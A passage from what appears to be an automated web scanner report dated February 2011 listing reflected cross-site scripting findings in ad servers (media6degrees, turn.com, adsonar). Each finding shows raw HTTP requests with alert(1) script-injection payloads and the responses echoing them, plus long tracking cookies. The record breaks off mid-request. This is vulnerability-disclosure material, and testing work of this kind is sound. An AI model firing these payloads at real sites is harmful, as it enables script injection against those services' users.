GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12707lxzt12707lxzt12707l; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122m0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl0axzm00000000004esx7120104tej49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r073ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1b
w4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct; adh="1lf17qo16033e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv274ys01x1709070v214; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=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; sglst=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdw3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgs01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: sglst=21l0s8dtlggrmr01w8m00d1801080120d8kmlggrmr01w8m00d1801080120davtlggrmr0056q00d1801080120d82hlebnns1ucve00z10000600200avjlggrmr01w8m00d1801080120d3kilggrmr01w8m00d1801080120dalhlggrmr01w8m00d1801080120d9bslggrmr01w8m00d1801080120dab4lebnns2707l01y1801080121581zlggrmr0056q00d1801080120d8gxlggrmr0056q00d1801080120d81ylginvd00000009180108012098gwlginvd0000000918010801209aoklggrmr0056q00d1801080120daollginvd0000000918010801209b07lggwth01r1w00b1801080120b8nclginvd00000009180108012097inlginvd0000000918010801209b05lggrmr01w8m00d1801080120dal1lggrmr01w8m00d1801080120d8wylginvd0000000918010801209bbhlggrmr01w8m00d1801080120d8wxlggrmr0056q00d1801080120db0clfjpei0yygv01k1801080121572slggtq2049ei00c1801080120cahhlginvd00000009180108012098nblggrmr0056q00d1801080120dahilggrmr0056q00d1801080120d7gdlgcqt508cbf00k1801080120kb08lfjpei0yygv01b1700070020040ulggrmr01w8m00d1801080120daprlggrmr01w8m00d1801080120d5l4lgcqt508cbf00k1801080120kaanlebnns1xg0o00o120007002008aelggrmr0056q00d1801080120d61hlggrmr01w8m00d1801080120d5b0lf17qo0000001o18010801215ag2leqh191um3b01v180108012153thlggrmr01w8m00d1801080120d8c9lggrmr0056q00d1801080120d9z4lggrmr01w8m00d1801080120dacjlggrmr01w8m00d1801080120db1alfjpei0yygv01k180108012159mmlggrmr0056q00d1801080120db0nlggrmr01w8m00d1801080120db0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00d1801080120d4zqlgl34k00000001180108012019cblggrmr0056q00d1801080120d0tllegh2b24m2901x180108012155q8lebnns1ucve00k100006002004wmlggrmr01w8m00d1801080120d8bglginvd0000000918010801209acelggrmr01w8m00d1801080120d45mlfdxmc0000001l18010801215bhdlginvd0000000918010801209; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:19 GMT
Content-Length: 830

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1";
</script>
...[SNIP]...

1.47. http://ad.media6degrees.com/adserv/cs [tId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the tId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37aa2"-alert(1)-"5ae84f10ba7 was submitted in the tId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12707lxzt12707lxzt12707l; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122m0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl0axzm00000000004esx7120104tej49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r073ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1b
w4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct; adh="1lf17qo16033e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv274ys01x1709070v214; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=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; sglst=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdp3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgl01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:12 GMT
Content-Length: 827

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
3br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7";
</script>
...[SNIP]...

1.48. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3c3"><script>alert(1)</script>10dcb1064b2 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4f3c3"><script>alert(1)</script>10dcb1064b2 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=4thKjbT4Dd-wLmJ_EvL6OGUx_YihuVVYu3_TfrxVOxLfaqaDzVRu9ZiuBStYaftYPFbUXCL2UgT2Zh2i9n4bdmEFJK3PW8OZmgDnNcPWCfNI4E_LJGBd5ktc9D2EP3iXVzloyRtYmz5WwUlOqhgjJzRf6EtvPvPDy4qyJ60plhIiUcxVMkOk7W6GdnfN9Orwi4ny57OJZgTzL2FsqZrAh5fiWQZAKAOwRHx78cjQB8i-ExJ7_A4Q_x0WiDS5R8s4qPZYQ2rQpBVvfWWYpFe6URy2Vs2VdJ_TjWWvjLV9Q8m6hMviS8YTqb-ZiVtIUBjDzfzTwFruRQFMbT_NyCr5tmotZSQRzCZw0LF6c45BQQz09oHzZ-yryLJ8uFUm4TqTtHFDougM6qn-fCnFGGL4NPUNvmQnKSR_IW4vjpinnmSpjj2_u47YbamQM73IHCy9Sl0ZpaTYKgObLd08Gd0JoGuaLLHRZ-Ykz_TkIVZ9huoJ8VG9LN1TNKQM_NPsV2xeGHi3bYbGKGUdjPIU0cMPnGmxPU3XXT2arCgoL6Dn4SMbxfNR_y_fM9tMo0Ph6oeDvYYKlkyzNn3JdfPZgqqaIviA5QdTAVKvxsbfG_RiFigTLmpyQcn5PksmVWqu3SbN0VyR3eDASlHpj1bavPEOnrozydlNm_TE_r6icluVhvQE5Ov43rl2rHjKBgmJieXzPjWJq1kMte659Vcd5HhCaUJMqEVW9CddSG3ugiIvGpPb38PDFUA8hG6SKkVM5AiGw80gZu3yl7Vvk0bmhH4LCjjLMwDmJjRrWXjcO5EGZgy-ExJ7_A4Q_x0WiDS5R8s4BTpYXsHIzHlWqOeElAAexRy2Vs2VdJ_TjWWvjLV9Q8nWiYtrtggzf6QC_emGCUYHkAYZWo2P43mtp_vZfpxwURmMklWmLOsCWcBHbWrEHfnZfxRZofW-YLqIXc_XLzmrtHFDougM6qn-fCnFGGL4NAnCoYY7ACuNqpuJuqlD4PrpKdIl-vCs8PYIscXyY2wFHIA3ClafPQTXMYm0ZGX1lQ868DsJ8CzRL-qFZYXXGjnjVL9jGjuvVIAupi7jFNwmxmjWmZmvAOPnNuXsYJKsZcpAzSHYH88Cmpasf_VURFf22rMJNM9ndqYziU5Lic-QRj7a56PoySegU7HYB2c8HfiA5QdTAVKvxsbfG_RiFigezlWM8YZNRG9XfqIkin8k0VyR3eDASlHpj1bavPEOntPhusJqVFauiLy6UaFFc3PYmsvrCy4wt-d-LduEaGqhUO6VPDt67tRjGh2NpKtfx8Q-S6gpZovZHf4-kC6dIE7b38PDFUA8hG6SKkVM5AiG7G4qQXY8m01JE-wQyevARsbLIt6lxw4qn7zj9tJ2fQGJD8GhxX6KZrz-6lFiGJ-dRv8YUVgIig-grRaq4S8oT-Q_b1qUvkrI7hhBR8IjByfmHTKIVgzw0wJBikXj03WpHLZWzZV0n9ONZa-MtX1DyZl0YUseit0Cb3G_gMYpmfL9wJ-3B_7kL8dMqUjPBdPRS-kP3YQEvr7AqH2rw9rktoXdbV9sNJrU4cvKljWSeO20cUOi6Azqqf58KcUYYvg0eCIP4EeWu1tLqPD3KXyux9cg7-TCOBWwPvbOtAvH7FGTa5jgFaEbBx4OAtVXexdyPlxg9BhJfaBCNSYQ5Kq_-Sjtcg1-30-9Ex6CEY-Yr1gzbPQ4BjJufC2fQIZLJhJjTiug9ME9M3D4Hl8Eiw362GgMO-O5Hy-7BFA0JHw__mPd1M64cIluMfueZjPGlcvizzBrSDsidMXjw5kLBtnZH3sxbrc1XjPazF6bacT5OH5OfL6S5Ch8nYybd10IPcQ93hujX2-lUqQOZRz7lhE-Mp13Bx7SEoyCM4rv0PtWLZlDJuYINnvP4ltz0zwgi9RdBr-KLFRC4eQNwFThZDiSaEHYLoXdcf54MP-yW5BVHlvKRVBkBjUodw_dLB6IX
2KDEvDFvZpoLKOIMM8vL4_UX54AJfo84MmNcJgucmF3a2rT3pH0CBj7HfwbEk4PHUhndSdvNmS_gGLRvueh6oi2M6aEMhx-btVOzA0hsRH2jLUVQcxEhmmaR_l3AS4SvhqrNqEcMkLIEPS56MjZCBdGPtsP2xTDqtDji7OeZPTeV4aXza8_gpDhhNfGv5kRzDqO8mTlK1zd_GN8J_C68v3vm6BzTfJiMvS8kl8QpS3DqrvGcnol-G-iOOCWmycV6dgRNwsJa0K7KBuioHn9OSA6OiovTKpiVvvksy9RWsNaBwlsK1sD2r9fBgo8cuHbz9o6Tiug9ME9M3D4Hl8Eiw362LLnvPdOAVRV_3-HFZurs-NwJI3B7sA3g7sDqxZPuDfgzzBrSDsidMXjw5kLBtnZH7oOoiCwaxJgx3v_OzDlP7JOfL6S5Ch8nYybd10IPcQ9X9Zc-e5Mnab9xws12uVaIR41EcKEDQON3vRYH1ZUr61GHZ56kCOvAMTmw-gDf-xHDkY3JWzdKEsukJ4BiXga1Q5GNyVs3ShLLpCeAYl4GtUORjclbN0oSy6QngGJeBrVn5kB8Bu8c7iHFAXgmGoiK5-ZAfAbvHO4hxQF4JhqIitAbIkJ3D687v0OZkfgvqhELnQlAE28n2DlyK7b-DFMmy50JQBNvJ9g5ciu2_gxTJuBUJX9pmSCLxiuzwYB86MTELbAFv_xsAvubJCJLlla0oa_uPyJAWAqD3ibcNxLhk9ZzfBU98RRGsiE7rLYAF7U0-lEpCQVO21AuaAn_6GWFjz7d-4JRCuozQQLfumpJSE1DAEFgyp5834TD56SR74-Gh_KZ4seqRyrSxDnYx6bbfvAdLEn8TgpYNDQOQBkNz_F4x9ydwRSyIlnBm5mjWTk2dsWUEe8YR0nRJ-RcjY4xKJY8_GDDsXZNc1xnOxIheEQaA4_4EDHKnfUnUEid2opeYGr2g6mjt8EkHand-oCrrsR_OIT6A1FqZldQLQBAfHRgcgF7FIdSZ5_87nT02pdOnckIzBPiMwCCKcMv-7LcniSJ_Z38uuHkYOliRcJOdbpoGbLCuvMNPg3cndaJwsK586AJWmQ44nwkhMoTIzPW2taqTWyyeGxhJe01tYYHhRwe50TGiQ4ayqZvxMwes0JcHudExokOGsqmb8TMHrNCYtqLln3rNkPy2fMYNItjb5p65N4NYIsxswLMnqfZzbqCZXHJ1GbJJRnbnm1mp0j6K931lLoYdbax2TZPhn7gigYHdiLIdqGJN4Fby-yTBP2ufYpAYQqKaBXZ3QHkktVEBQJcQBlsfrYmJhYACPhmlxrA0gThBUR_zElsqQPAsivSfXt6uuP7jvz9fgKyii_iYGj9voxAgcfPraiNme77-893dHG8TFoJbhrCrvd5u6DZXmYt3xjOemA4riPtg-VlcukHHk83m-gUQjwWqAerbhO6rTzKugJUqBqQ9F50l9JRxXHlVSYCTiFzrRayu0fCO6vLYbwbFb6diFeniXAnXYICxs_4rTchCin_F_gXJw3CAsbP-K03IQop_xf4FycNwgLGz_itNyEKKf8X-BcnDcICxs_4rTchCin_F_gXJw3SBYpq5h-OqNGCLdyjyYb4qyq4RHxj-sjEeXvEtPcPdY; fc=Q-i4UMc4QwIi-DRd9R6ia1J9_78D67FqFC0kV3tGd2QJJ7mWye14_2YpDYf2fGJzuDSye8dCcqjb55W88by2Y_lYn6WwWx8I_DeXmnM2x-jLDfaXqd7ordwJWxbMBXbCcEhYog6oHcMAxRPP4dyBk0paMt9KyzBYx_f8zOMt1_UkBxkTNTAXWm9kNSZlguLR5fjP49PUhu7v4L3sHsRyZQ; 
pf=W2lAvdO3UPK-67n93CR4V70h141EwRpVphJqTZeRapKuzdsXKOJykAJ3JxnPju9g5ehdKFP2wXAGuCUFv7XIPM0FzExGm1jv4Kvu640165OBvBXtoV0UQOpa27TXESVF-de5fP3AwoGiR_AIBPhToig1AM_gTSow1560pWbhh838I1Xi_FMkgIPwMPeBqodwgbWWL1_JBXWn8zgepH7BPbePalyqFZ93Lsfi8SgLVgTh-j-bH1npoySPlo-IWRvpNkaZBgGmnWJmvGYlVmPlSbHlSr1VTT1nlb50Fr5vj40NZDpqhun3lj0r0CvR0Vihm4m9vudXxCMFAjgeVFO5-xpIFGJioNw2vkEYe3YJ8emaUo3Hsp3jaymvGUlYuixmCOI3go4MrecUnPRzHm5YdxPKKY4kV-q2UJvSEkgnXksxeQb5A05wXSsD8Fj_F7za0NBQ4tKieMWx6gEN0MztGbK9Ye_wQX5bwuwz0ovjoTMcI4I2StnJ390lD_AvrOFoljQUjac8_W0UA2peA_VkfivKVPa-K620ApvhUtsRg48; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15018%7C15018%7C15018%7C15018%7Cundefined%7C15018%7C15018%7C15018%7C15018%7C15018%7C15018%7C15018%7C14983%7C15018%7C15003; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 13-Aug-2011 01:34:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:34:03 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2383879606519371855&fpid=4f3c3"><script>alert(1)</script>10dcb1064b2&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.49. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 32ead<script>alert(1)</script>edf430560af was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=190076932ead<script>alert(1)</script>edf430560af&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
